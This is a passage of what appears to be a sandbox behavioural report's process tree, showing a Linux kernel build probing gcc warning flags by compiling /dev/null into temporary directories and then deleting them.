-
/usr/bin/rmrm -rf /tmp/a/.tmp_18004⤵PID:1805
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wzero-length-bounds -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-zero-length-bounds\"; else echo \"\"; fi"3⤵PID:1806
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18064⤵PID:1807
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wzero-length-bounds -c -x c /dev/null -o /tmp/a/.tmp_1806/tmp4⤵PID:1808
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D CC_USING_FENTRY /dev/null -quiet -dumpdir /tmp/a/.tmp_1806/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mrecord-mcount -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wzero-length-bounds "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fstack-protector-strong -o /tmp/ccGO4JKA.s5⤵PID:1809
-
-
/usr/local/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1806/tmp /tmp/ccGO4JKA.s5⤵PID:1810
-
-
/usr/local/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1806/tmp /tmp/ccGO4JKA.s5⤵PID:1810
-
-
/usr/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1806/tmp /tmp/ccGO4JKA.s5⤵PID:1810
-
-
/usr/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1806/tmp /tmp/ccGO4JKA.s5⤵PID:1810
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18064⤵PID:1811
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wstringop-overflow -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-stringop-overflow\"; else echo \"\"; fi"3⤵PID:1812
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18124⤵PID:1813
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wstringop-overflow -c -x c /dev/null -o /tmp/a/.tmp_1812/tmp4⤵
- Writes file to tmp directory
PID:1814 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D CC_USING_FENTRY /dev/null -quiet -dumpdir /tmp/a/.tmp_1812/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mrecord-mcount -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds "-Wstringop-overflow=2" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fstack-protector-strong -o /tmp/cck4VyNi.s5⤵
- Writes file to tmp directory
PID:1815
-
-
/usr/local/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1812/tmp /tmp/cck4VyNi.s5⤵PID:1816
-
-
/usr/local/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1812/tmp /tmp/cck4VyNi.s5⤵PID:1816
-
-
/usr/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1812/tmp /tmp/cck4VyNi.s5⤵PID:1816
-
-
/usr/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1812/tmp /tmp/cck4VyNi.s5⤵PID:1816
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18124⤵PID:1817
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wrestrict -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-restrict\"; else echo \"\"; fi"3⤵PID:1818
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18184⤵PID:1819
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wrestrict -c -x c /dev/null -o /tmp/a/.tmp_1818/tmp4⤵
- Writes file to tmp directory
PID:1820 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D CC_USING_FENTRY /dev/null -quiet -dumpdir /tmp/a/.tmp_1818/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mrecord-mcount -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds "-Wstringop-overflow=0" -Wrestrict "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fstack-protector-strong -o /tmp/ccU8jKL4.s5⤵PID:1821
-
-
/usr/local/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1818/tmp /tmp/ccU8jKL4.s5⤵PID:1822
-
-
/usr/local/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1818/tmp /tmp/ccU8jKL4.s5⤵PID:1822
-
-
/usr/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1818/tmp /tmp/ccU8jKL4.s5⤵PID:1822
-
-
/usr/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1818/tmp /tmp/ccU8jKL4.s5⤵PID:1822
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18184⤵PID:1823
-
-
-
/bin/sh/bin/sh -c "[ 1104000 -ge 0901000 ] && echo -Wno-alloc-size-larger-than || echo "3⤵PID:1824
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Werror=incompatible-pointer-types\"; else echo \"\"; fi"3⤵PID:1825
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18254⤵
- Reads runtime system information
PID:1826
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack "-Werror=date-time" "-Werror=incompatible-pointer-types" -c -x c /dev/null -o /tmp/a/.tmp_1825/tmp4⤵
- Writes file to tmp directory
PID:1827 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D CC_USING_FENTRY /dev/null -quiet -dumpdir /tmp/a/.tmp_1825/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mrecord-mcount -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Walloc-size-larger-than=18446744073709551615EiB" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fno-strict-overflow "-fstack-check=no" -fconserve-stack -fstack-protector-strong -o /tmp/ccjtgowg.s5⤵
- Writes file to tmp directory
PID:1828
-
-
/usr/local/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1825/tmp /tmp/ccjtgowg.s5⤵PID:1829
-
-
/usr/local/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1825/tmp /tmp/ccjtgowg.s5⤵PID:1829
-
-
/usr/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1825/tmp /tmp/ccjtgowg.s5⤵PID:1829
-
-
/usr/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1825/tmp /tmp/ccjtgowg.s5⤵
- Writes file to tmp directory
PID:1829
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18254⤵PID:1830
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Werror=designated-init\"; else echo \"\"; fi"3⤵PID:1831
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18314⤵PID:1832
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -c -x c /dev/null -o /tmp/a/.tmp_1831/tmp4⤵
- Writes file to tmp directory
PID:1833 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D CC_USING_FENTRY /dev/null -quiet -dumpdir /tmp/a/.tmp_1831/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mrecord-mcount -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Walloc-size-larger-than=18446744073709551615EiB" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fno-strict-overflow "-fstack-check=no" -fconserve-stack -fstack-protector-strong -o /tmp/cciCJAPV.s5⤵
- Writes file to tmp directory
PID:1834
-
-
/usr/local/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1831/tmp /tmp/cciCJAPV.s5⤵PID:1835
-
-
/usr/local/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1831/tmp /tmp/cciCJAPV.s5⤵PID:1835
-
-
